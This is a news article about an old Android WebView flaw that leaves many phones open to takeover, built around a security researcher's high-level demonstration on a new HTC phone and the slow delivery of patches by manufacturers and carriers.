You might think buying a new phone from your mobile service provider means the latest model comes with updated software, guarding against potential cyberattacks. Well, you'd be wrong.
Android phones are the most popular smartphones in the world, with more than 78 percent market share, according IDC's Worldwide Quarterly Mobile Phone Tracker.
The number of Android smartphone users worldwide is estimated to have reached 1.16 billion in 2013, according to Ramon Llamas, IDC's mobile phone research manager.
Tod Beardsley, so-called ethical hacker and engineering manager for Rapid 7, a cybersecurity firm, estimates about 70 percent of Android phones in use today still contain a bug uncovered by security researchers more than two years ago, making them vulnerable to cyberattacks. The bug was publicly disclosed about 16 months ago, but outdated versions of the software still exist on some smartphones, Beardsley said.
An ethical hacker is sometimes referred to as a "white hat" hacker who investigates software and hardware vulnerabilities with the main goal of fixing those flaws to prevent future cyberattacks. "Black hat" hackers in contrast are the bad guys, and intentionally exploit vulnerabilities for financial or other personal gain.
The vulnerability affects Android operating software versions between 4.0 and 4.2, said Joshua Drake, lead author of the "Android Hacker's Handbook."
Although Google implemented a fix, there's still a lag in consumers receiving updates for mobile devices, Beardsley says. Google declined emailed requests for comment on the vulnerability.
Security researchers told CNBC this is a common problem with Android OS because of the open-source nature of the Android platform. Tracking updates and quality control are a challenge.
"Different manufacturers have the freedom to have their own version and flavor of the Android OS they use, therefore there is no enforcement or centralized control around patch management for releasing new updates," said Nima Dezhkam, principal consultant for Security Compass, an information security firm.
Read MoreWhat hackers do for fun
Beardsley recently demonstrated the attack on a new, out-of-the-box HTC smartphone, using AT&T service, for CNBC. Beardsley said his goal, by demonstrating the attack, is to put more pressure on manufacturers and mobile phone service providers to provide consumers with an upgrade of the latest patched software.
Playing the role of both the attacker with a laptop computer and the role of victim with the HTC smartphone for our cameras, Beardsley showed how this vulnerability can be exploited. He first sets up a fake "evil" website to lure victims.
Baiting victims through email, social media or by displaying a Quick Response (QR) code that looks like a barcode, an attacker can lure the victim to the suspicious website. A simple click on a link by the user, and Beardsley can seize control, exploiting the Android WebView vulnerability.
Beardsley demonstrated by scanning the QR code. An alert immediately sounded on the laptop, and a message appeared that said, "Command shell session 8 opened…," allowing him to type commands that the victim's phone will now obey.
Beardsley proceeds to access photos on the phone's gallery and that's not all. He can also plant photos that may be compromising to the victim.
Smartphone maker HTC did not respond to email requests seeking comment on the Android WebView vulnerability.